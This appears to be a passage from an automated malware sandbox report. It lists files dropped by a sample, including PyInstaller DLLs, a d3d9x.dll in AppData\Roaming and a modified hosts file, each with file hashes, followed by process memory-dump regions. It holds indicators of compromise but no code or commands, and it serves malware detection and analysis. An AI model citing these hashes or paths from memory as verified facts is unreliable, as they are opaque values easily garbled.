                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI11682\python38.dll

                                                                                          Filesize

                                                                                          4.0MB

                                                                                          MD5

                                                                                          d2a8a5e7380d5f4716016777818a32c5

                                                                                          SHA1

                                                                                          fb12f31d1d0758fe3e056875461186056121ed0c

                                                                                          SHA256

                                                                                          59ab345c565304f638effa7c0236f26041fd06e35041a75988e13995cd28ace9

                                                                                          SHA512

                                                                                          ad1269d1367f587809e3fbe44af703c464a88fa3b2ae0bf2ad6544b8ed938e4265aab7e308d999e6c8297c0c85c608e3160796325286db3188a3edf040a02ab7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI11682\ucrtbase.dll

                                                                                          Filesize

                                                                                          1021KB

                                                                                          MD5

                                                                                          4e326feeb3ebf1e3eb21eeb224345727

                                                                                          SHA1

                                                                                          f156a272dbc6695cc170b6091ef8cd41db7ba040

                                                                                          SHA256

                                                                                          3c60056371f82e4744185b6f2fa0c69042b1e78804685944132974dd13f3b6d9

                                                                                          SHA512

                                                                                          be9420a85c82eeee685e18913a7ff152fcead72a90ddcc2bcc8ab53a4a1743ae98f49354023c0a32b3a1d919bda64b5d455f6c3a49d4842bbba4aa37c1d05d67

                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_godqiby3.dpt.ps1

                                                                                          Filesize

                                                                                          60B

                                                                                          MD5

                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                          SHA1

                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                          SHA256

                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                          SHA512

                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                        • C:\Users\Admin\AppData\Roaming\d3d9x.dll

                                                                                          Filesize

                                                                                          473KB

                                                                                          MD5

                                                                                          8858d2b92c921bbe7126a9048b430bf5

                                                                                          SHA1

                                                                                          ac24cdb9d5b8b4c0135afded7faa31e000929c95

                                                                                          SHA256

                                                                                          1f761a57fe057d88becdc441d4aae37029ddbc1cd808ab2f838dcce76e869717

                                                                                          SHA512

                                                                                          fc471cbaa3834c1c3f51c126b3fb7703b42c92b88c4489b9b6d913dd8ae604bf7ed177da1224b522c0a39c7c1cc671cd2a1c52e04d44e3ebddd968c970cd996c

                                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          7aed163a7c554d2c86de68d11a55d030

                                                                                          SHA1

                                                                                          8416928fbe1aa0ab181a6d6abe1e30ef82ea25ea

                                                                                          SHA256

                                                                                          b5f1a672f239b65afa1f8e8a0b7da5f793e9ff6f3f8aff2818c6c635f0b360b9

                                                                                          SHA512

                                                                                          6dc00db724ce2567754a79fc3f5e0e2133abad323ced5beed053fd51f93227c3e263e008ada5f853cf47a27080a66ef921c2c210be7386d589383fcb984b3cfd

                                                                                        • memory/228-698-0x0000000000D80000-0x0000000000DE8000-memory.dmp

                                                                                          Filesize

                                                                                          416KB

                                                                                        • memory/556-585-0x0000000000A70000-0x0000000000AC4000-memory.dmp

                                                                                          Filesize

                                                                                          336KB

                                                                                        • memory/612-685-0x00000000003A0000-0x00000000003B6000-memory.dmp

                                                                                          Filesize

                                                                                          88KB

                                                                                        • memory/792-53-0x0000000000550000-0x000000000059D000-memory.dmp

                                                                                          Filesize

                                                                                          308KB

                                                                                        • memory/792-56-0x0000000000550000-0x000000000059D000-memory.dmp

                                                                                          Filesize

                                                                                          308KB

                                                                                        • memory/792-58-0x0000000000550000-0x000000000059D000-memory.dmp

                                                                                          Filesize

                                                                                          308KB

                                                                                        • memory/792-51-0x0000000000550000-0x000000000059D000-memory.dmp

                                                                                          Filesize

                                                                                          308KB

                                                                                        • memory/1168-500-0x00000000033C0000-0x0000000003410000-memory.dmp

                                                                                          Filesize

                                                                                          320KB

                                                                                        • memory/1168-501-0x000000001D4C0000-0x000000001D572000-memory.dmp

                                                                                          Filesize

                                                                                          712KB

                                                                                        • memory/1976-518-0x0000000000580000-0x00000000008A4000-memory.dmp

                                                                                          Filesize

                                                                                          3.1MB

                                                                                        • memory/2208-610-0x0000000000CE0000-0x0000000000CF6000-memory.dmp

                                                                                          Filesize

                                                                                          88KB

                                                                                        • memory/2624-33-0x0000000000BD0000-0x0000000000C72000-memory.dmp

                                                                                          Filesize

                                                                                          648KB

                                                                                        • memory/2728-588-0x00007FF614750000-0x00007FF614CE7000-memory.dmp

                                                                                          Filesize

                                                                                          5.6MB

                                                                                        • memory/3320-183-0x0000021E7B900000-0x0000021E7B922000-memory.dmp

                                                                                          Filesize

                                                                                          136KB

                                                                                        • memory/3372-322-0x00007FF760560000-0x00007FF7605AC000-memory.dmp

                                                                                          Filesize

                                                                                          304KB

                                                                                        • memory/3564-144-0x00000000096A0000-0x00000000096E6000-memory.dmp

                                                                                          Filesize

                                                                                          280KB

                                                                                        • memory/3564-141-0x0000000008DC0000-0x0000000008DFE000-memory.dmp

                                                                                          Filesize

                                                                                          248KB

                                                                                        • memory/3564-146-0x0000000009840000-0x0000000009893000-memory.dmp

                                                                                          Filesize

                                                                                          332KB

                                                                                        • memory/3564-143-0x0000000008E00000-0x0000000008E42000-memory.dmp

                                                                                          Filesize

                                                                                          264KB

                                                                                        • memory/3580-534-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-389-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-412-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-369-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-371-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-370-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-362-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-368-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-375-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-374-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-373-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-372-0x0000000140000000-0x00000001402FB000-memory.dmp

                                                                                          Filesize

                                                                                          3.0MB

                                                                                        • memory/3580-397-0x0000000000400000-0x0000000000F06000-memory.dmp

                                                                                          Filesize

                                                                                          11.0MB

                                                                                        • memory/3728-319-0x0000000005940000-0x0000000005A4A000-memory.dmp

                                                                                          Filesize

                                                                                          1.0MB

                                                                                        • memory/3728-321-0x00000000058D0000-0x000000000590C000-memory.dmp

                                                                                          Filesize

                                                                                          240KB

                                                                                        • memory/3728-339-0x0000000006CE0000-0x0000000006D46000-memory.dmp

                                                                                          Filesize

                                                                                          408KB

                                                                                        • memory/3728-314-0x0000000000C80000-0x0000000000CD2000-memory.dmp

                                                                                          Filesize

                                                                                          328KB

                                                                                        • memory/3728-361-0x0000000008480000-0x00000000089AC000-memory.dmp

                                                                                          Filesize

                                                                                          5.2MB

                                                                                        • memory/3728-315-0x0000000005BC0000-0x0000000006166000-memory.dmp

                                                                                          Filesize

                                                                                          5.6MB

                                                                                        • memory/3728-316-0x0000000005610000-0x00000000056A2000-memory.dmp

                                                                                          Filesize

                                                                                          584KB

                                                                                        • memory/3728-350-0x0000000002F90000-0x0000000002FE0000-memory.dmp

                                                                                          Filesize

                                                                                          320KB

                                                                                        • memory/3728-317-0x00000000055A0000-0x00000000055AA000-memory.dmp

                                                                                          Filesize

                                                                                          40KB

                                                                                        • memory/3728-318-0x0000000007190000-0x00000000077A8000-memory.dmp

                                                                                          Filesize

                                                                                          6.1MB

                                                                                        • memory/3728-360-0x0000000007D80000-0x0000000007F42000-memory.dmp

                                                                                          Filesize

                                                                                          1.8MB

                                                                                        • memory/3728-320-0x0000000005870000-0x0000000005882000-memory.dmp

                                                                                          Filesize

                                                                                          72KB

                                                                                        • memory/3728-323-0x0000000005A50000-0x0000000005A9C000-memory.dmp

                                                                                          Filesize

                                                                                          304KB

                                                                                        • memory/3848-335-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp

                                                                                          Filesize

                                                                                          9.0MB

                                                                                        • memory/3848-338-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp

                                                                                          Filesize

                                                                                          9.0MB

                                                                                        • memory/3848-336-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp

                                                                                          Filesize

                                                                                          9.0MB

                                                                                        • memory/3848-333-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp

                                                                                          Filesize

                                                                                          9.0MB

                                                                                        • memory/3848-334-0x00007FF6ACD10000-0x00007FF6AD61C000-memory.dmp

                                                                                          Filesize

                                                                                          9.0MB

                                                                                        • memory/3972-150-0x000000007499E000-0x000000007499F000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/3972-18-0x0000000074990000-0x0000000075141000-memory.dmp

                                                                                          Filesize

                                                                                          7.7MB

                                                                                        • memory/3972-17-0x0000000005290000-0x000000000532C000-memory.dmp

                                                                                          Filesize

                                                                                          624KB

                                                                                        • memory/3972-16-0x00000000008B0000-0x00000000008B8000-memory.dmp

                                                                                          Filesize

                                                                                          32KB

                                                                                        • memory/3972-177-0x0000000074990000-0x0000000075141000-memory.dmp

                                                                                          Filesize

                                                                                          7.7MB

                                                                                        • memory/3972-15-0x000000007499E000-0x000000007499F000-memory.dmp

                                                                                          Filesize

                                                                                          4KB

                                                                                        • memory/3972-752-0x0000000074990000-0x0000000075141000-memory.dmp

                                                                                          Filesize

                                                                                          7.7MB

                                                                                        • memory/4320-525-0x0000000000C70000-0x0000000000C76000-memory.dmp

                                                                                          Filesize

                                                                                          24KB

                                                                                        • memory/5100-411-0x0000000000750000-0x0000000000A9E000-memory.dmp

                                                                                          Filesize

                                                                                          3.3MB